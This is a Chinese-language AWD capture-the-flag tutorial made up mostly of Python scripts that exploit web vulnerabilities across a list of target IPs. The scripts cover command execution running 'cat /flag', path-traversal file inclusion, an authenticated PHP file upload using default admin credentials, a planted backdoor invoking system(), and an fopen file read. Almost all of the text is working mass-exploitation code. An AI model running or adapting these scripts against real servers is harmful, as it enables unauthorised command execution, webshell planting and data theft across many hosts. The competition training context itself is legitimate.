AWD比赛中,是以周期得分当你发现一个漏洞即可连续批量的分,要想连续得分必须会权限维持,还有批量获取flag,本文记录如何批量获取前文相关漏洞的flag.
01 python(使用语言)
Python是一种跨平台的计算机程序设计语言。是一种面向对象的动态类型语言,最初被设计用于编写自动化脚本(shel),随着版本的不断更新和语言新功能的添加,越多被用于独立的大型项目的开发。在写批量脚本的过程需要掌握python语言。
02 漏洞批量脚本
命令执行
post传参 漏洞点
import requests
f = open('ip.txt','r')
data = {"shell":'cat /flag'}
for i in f.readlines():
url = 'http://'+i.strip()+'/footer.php'
r = requests.post(url,data=data)
x = r.text
print(url +' '+ x)
文件包含
get 传参 漏洞点
列举两种写法
#正则匹配
import requests
import re
f = open('ip.txt','r')
for i in f.readlines():
url = 'http://'+i.strip()+''
path = '/about.php?file=/flag'
palyoad = url + path
r = requests.get(palyoad)
result = re.search('[a-z0-9]{32}',r.text)
if r.status_code==200:
print(url,result.group())
else:
print(url,"There is no flag here")
f.close()
#切片
import requests
f = open('ip.txt','r')
for i in f.readlines():
url = 'http://'+i.strip()
url_path = '/about.php?file=../../../../../../../flag'
palyoad = url + url_path
r = requests.get(palyoad)
i = r.text.split('\n')
print(url+' '+i[0].split('<')[0])
文件上传
漏洞点
import requests
f = open('ip.txt','r')
for i in f.readlines():
URL = 'http://'+ i.strip()
url_path = '/login.php'
url_path1 = '/admin/upload.php'
url = URL + url_path
user_passwd = {'username':'admin',
'password':'mysql',
'button':'SIGN-I',}
s=requests.Session()
r=s.post(url,data=user_passwd)
header = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',}
file ={
'pic':('2.php',open('a.php','rb')), #1.php这一块是文件名 ; pic也必须得改,是Content-Disposition: form-data; name="pic"; filename="php_mmr.php"
'Content-Disposition':'form-data',
'Content-Type':'image/jpeg',
}
url = URL + url_path1
r1 = s.post(url = url, files=file,headers=header)
r1.encoding = r1.apparent_encoding
if r1.status_code != 200:
print(url + ' \033[1;31m上传失败\033[0m')
else :
for i in r1.text.split('\n'):
if '上传成功' in i:
print(url + ' \033[1;32m上传成功\033[0m ' + i)
break
预留后门文件利用
import requests
f = open('ip.txt', 'r')
for i in f.readlines():
url = 'http://' + i.strip()
url_path = '/a.php?c=system("cat /flag");'
r = requests.get(url + url_path)
i = r.text.split('\n')
print(url+' '+i[0].split('<')[0])
fopen漏洞
import requests
import re
f = open('ip.txt', 'r')
for i in f.readlines():
url = 'http://' + i.strip()+''
path = '/contact.php?path=/flag'
payload = url + path
r = requests.get(url + path)
x = r.text
result = re.search('[a-z0-9]{32}',x)
print(url, result.group())